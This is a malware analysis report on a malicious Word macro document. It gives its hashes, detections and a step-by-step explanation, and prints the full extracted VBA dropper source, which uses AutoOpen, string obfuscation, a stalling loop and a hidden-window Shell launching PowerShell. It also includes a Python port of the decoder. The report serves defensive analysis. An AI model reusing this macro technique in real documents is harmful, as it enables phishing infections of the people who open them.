Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7f2076337237f0c4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 52.0 KB
Created: 2018-04-19 10:47:00
Authoring application: Microsoft Office Word
First seen: 2018-04-30
MD5: 86d8ca6dd0764607545fb119567e7bde
SHA-1: 539fa856001dab587d5881c5b275f7e772fb1d13
SHA-256: 7f2076337237f0c48c3081d6b3ce3c8e77c4424661a02f85101142fe4266e798
Risk score: 170

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project with an AutoOpen procedure, so the macro runs as soon as the document is opened (subject to the user's macro security setting). AutoOpen calls Module1.Swedenarform, which decodes the string literal in slipersat by dropping the characters M, W, Z and C and decrementing every remaining character code by one; the literal alone decodes to cmd /c PowerShell  "'PowerShell ""<#4ex#>function (50 characters), and the rest of the payload is appended from Form1.TextBox1.Text, a form-control value that is stored in the UserForm storage rather than in the VBA source. The decoded string is written to TextBox1, copied to TextBox2 by a change handler that first spins through 200,004 no-op string assignments (a stalling loop), and then passed to Shell with window style 0 (vbHide) in Form1.But_click, which is the call the critical OLE_VBA_SHELL heuristic flags. The ClamAV signature Doc.Dropper.Agent-6510804-0 is consistent with this behaviour: a hidden-window PowerShell dropper launched from a macro.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6510804-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6510804-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched lines in script:
      wd = Form1.TextBox2.Tag
      If "" = wd Then Shell s, Kolm
      Form1.TextBox2.Text = ""
    The first argument s is Form1.TextBox2.Text, which holds the decoded command at this point; Kolm evaluates to 178 - 170 - 8 = 0 (vbHide), so the child process starts with a hidden window. The call is skipped when TextBox2.Tag is non-empty, which is a cheap kill switch the author can flip by editing the form.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched lines in script:
      Attribute VB_Customizable = True
      Sub AutoOpen()
      Swedenarform
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat for this sample: the generic description above does not hold here, because a VBA project was recovered (macros.bas under Extracted artifacts) and the AutoOpen it found is the same procedure that fired OLE_VBA_AUTOOPEN. Treat this heuristic as redundant with OLE_VBA_AUTOOPEN rather than as evidence of a separate WordBasic macro.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace that Office writes into any document containing drawing markup. It is not a host the macro contacts and is not an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3268 bytes
SHA-256: d3560f9bbe08f86909c58977cf702ae48b18bb7b803c9472d0db625dc1a906e5

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Swedenarform
End Sub

Attribute VB_Name = "Module1"

Function zasohpers()
Dim jir As Integer
jir = 5 + 1
zasohpers = jir - 1
jir = 1 + zasohpers
End Function

Rem Form1 show messages


Function kontakter(str26, count1)
Dim xon20() As Byte
Dim maxdaj As String
Dim minbit() As Byte
Dim kas3 As String
xon20 = "MWZC"
Dim maxe() As Byte
Dim kaspr As Integer
kaspr = 0
Dim fruka As Integer
kas3 = xon20
Dim j1 As String
Dim xopova As Integer
Dim XrttacaI() As Byte
Dim I As Integer
I = 374
Dim Qapi2 As Integer
WSOP = Form1.Con(xon20)
Dim ngwiL As String
xopova = 92 - str26
xopova = xopova - 1
Dim hzmould As String
j1 = count1
maxdaj = ""
maxe = j1
hzmould = "RgeHise"
Qapi2 = Form1.Con(maxe)
ngwiL = "Mirqc8"
hujkot = kaspr
For uD = hujkot To Qapi2
manji = kaspr
For zaLp1 = kaspr To WSOP
If maxe(uD) = xon20(zaLp1) Then
manji = manji + kaspr + 1
End If
Next
If hujkot = manji Then
maxdaj = maxdaj + Form1.paplace(maxe(uD) - xopova)
End If
Next
kontakter = maxdaj
With Form1
.TextBox1.Text = maxdaj
fruka = I + xopova
fruka = -fruka + Len(maxdaj)
If 107 < fruka Then
.But_click
End If
.TextBox2.Text = ""
End With
End Function




Function slipersat()
Dim jiko As String
jiko = "dnZe!0dCZ!QpxZCfsTifZCZmm!M!#(CQpxfWWsTCWifZCMmm!MW#CW#=$WZM5fWZCy$?gZZCvWZWodWujpoMMW!C"
Dim ni As Integer
ni = 1
With Form1
jiko = jiko + .TextBox1.Text
Rem + .TextBox2.Text
slipersat = jiko
End With
ni = ni + 1
End Function



Sub Swedenarform()
Dim sder As String
Dim palat As Integer
palat = 60 + 30
sder = kontakter(palat, slipersat())
hernas = 0
End Sub

Attribute VB_Name = "Form1"
Attribute VB_Base = "0{3FC0B45D-54EF-43D0-8988-06E290D36B61}{99FDA0F1-DB26-40FF-AF58-FBA20B73EBBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function Con(nij)
zzpa = 0
Con = zzpa + UBound(nij)
End Function

Private Sub com2_Click()
Form1.TextBox1.Text = "4"
End Sub

Private Sub CommandButton2_Click()
Form1.TextBox2.Text = "5"
End Sub

Private Sub but1_Click()

End Sub

Private Sub but2_Click()
Form1.TextBox1.Text = ""
End Sub

Private Sub Label1_Click()

End Sub

Private Sub ListBox1_Click()
Form1.TextBox2.Text = ""
End Sub

Private Sub TextBox1_Change()
Dim s1 As String
s1 = Form1.TextBox1.Text
For J = 0 To 3
For I = 0 To 50000
s1 = "" + s1
Next I
Next J
Form1.TextBox2.Text = s1
End Sub

Function paplace(masad)
Dim stio As Integer
stio = masad + 5
paplace = Chr$(stio - 5)
End Function

Private Sub TextBox2_Change()

End Sub

Sub But_click()
Dim s As String
s = Form1.TextBox2.Text + ""
Dim Im As Integer
Kolm = 178 - 170 - 8
wd = Form1.TextBox2.Tag
If "" = wd Then Shell s, Kolm
Form1.TextBox2.Text = ""
End Sub
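To recover the first-stage command without opening the document in Word, the decoder spread across Module1.kontakter and Form1.paplace can be ported to Python. The block below is an added example written for this report; it is not part of the sample and not part of the analysis tooling. It takes the literal from slipersat exactly as shown above, reproduces VBA's String-to-Byte-array conversion (UTF-16LE, which is why the key's 0x00 bytes also strip the high bytes of every character), and emulates the length gate and the Shell window style from the same code. The form_textbox1_default parameter is a placeholder for the value stored in Form1.TextBox1, which lives in the UserForm storage and is not in the extracted VBA source; it is assumed unknown here.

```python
"""Port of the string decoder in the extracted macro (Module1.kontakter +
Form1.paplace), plus the length gate and the Shell window style it feeds.
Added example for this report; not code from the sample or the tooling."""

# Literal copied from Module1.slipersat in the extracted macro. It is the only
# part of the payload present in the VBA source; at runtime slipersat appends
# Form1.TextBox1.Text to it.
SLIPERSAT_LITERAL = (
    "dnZe!0dCZ!QpxZCfsTifZCZmm!M!#(CQpxfWWsTCWifZCMmm!MW#CW#=$WZM5fWZCy$?gZZCvWZWodWujpoMMW!C"
)

KEY = "MWZC"        # xon20 in kontakter
PALAT = 60 + 30     # str26 argument passed by Swedenarform


def vba_bytes(s: str) -> bytes:
    """VBA copies a String into a Byte array as UTF-16LE, so each ASCII
    character becomes (code, 0x00). The 0x00 bytes matter for the filter."""
    return s.encode("utf-16-le")


def kontakter(str26: int, count1: str, key: str = KEY) -> str:
    """Drop every payload byte that also occurs in the key's byte array
    (M, W, Z, C and 0x00), shift each survivor down by xopova and emit it
    with Chr$ (Form1.paplace adds 5 and subtracts 5 again, a no-op)."""
    xopova = 92 - str26 - 1                      # 1 for the sample's str26=90
    drop = set(vba_bytes(key))
    return "".join(chr(b - xopova) for b in vba_bytes(count1) if b not in drop)


def shell_window_style() -> int:
    """Kolm = 178 - 170 - 8 in Form1.But_click; 0 is vbHide."""
    return 178 - 170 - 8


def length_gate_passes(decoded: str, str26: int = PALAT) -> bool:
    """The 'If 107 < fruka' test in kontakter that guards the call to
    But_click: fruka = Len(maxdaj) - (374 + xopova), so Shell only fires when
    the decoded string is longer than 482 characters."""
    xopova = 92 - str26 - 1
    return 107 < len(decoded) - (374 + xopova)


def first_stage_command(form_textbox1_default: str = "") -> str:
    """Mirror Swedenarform -> kontakter(palat, slipersat()). The argument is a
    hypothetical stand-in for Form1.TextBox1's stored default value, which is
    not in the extracted VBA source."""
    return kontakter(PALAT, SLIPERSAT_LITERAL + form_textbox1_default)


if __name__ == "__main__":
    cmd = first_stage_command()
    print(repr(cmd))
    print("Shell window style:", shell_window_style())
    print("length gate passes on the literal alone:", length_gate_passes(cmd))
```

On the literal alone the decoder returns cmd /c PowerShell  "'PowerShell ""<#4ex#>function followed by a trailing space, 50 characters, so the 482-character gate fails and But_click is never reached. The remainder of the PowerShell script must therefore sit in TextBox1's default value in the Form1 UserForm storage; pull that value out of the document separately and pass it as form_textbox1_default to recover the full command line.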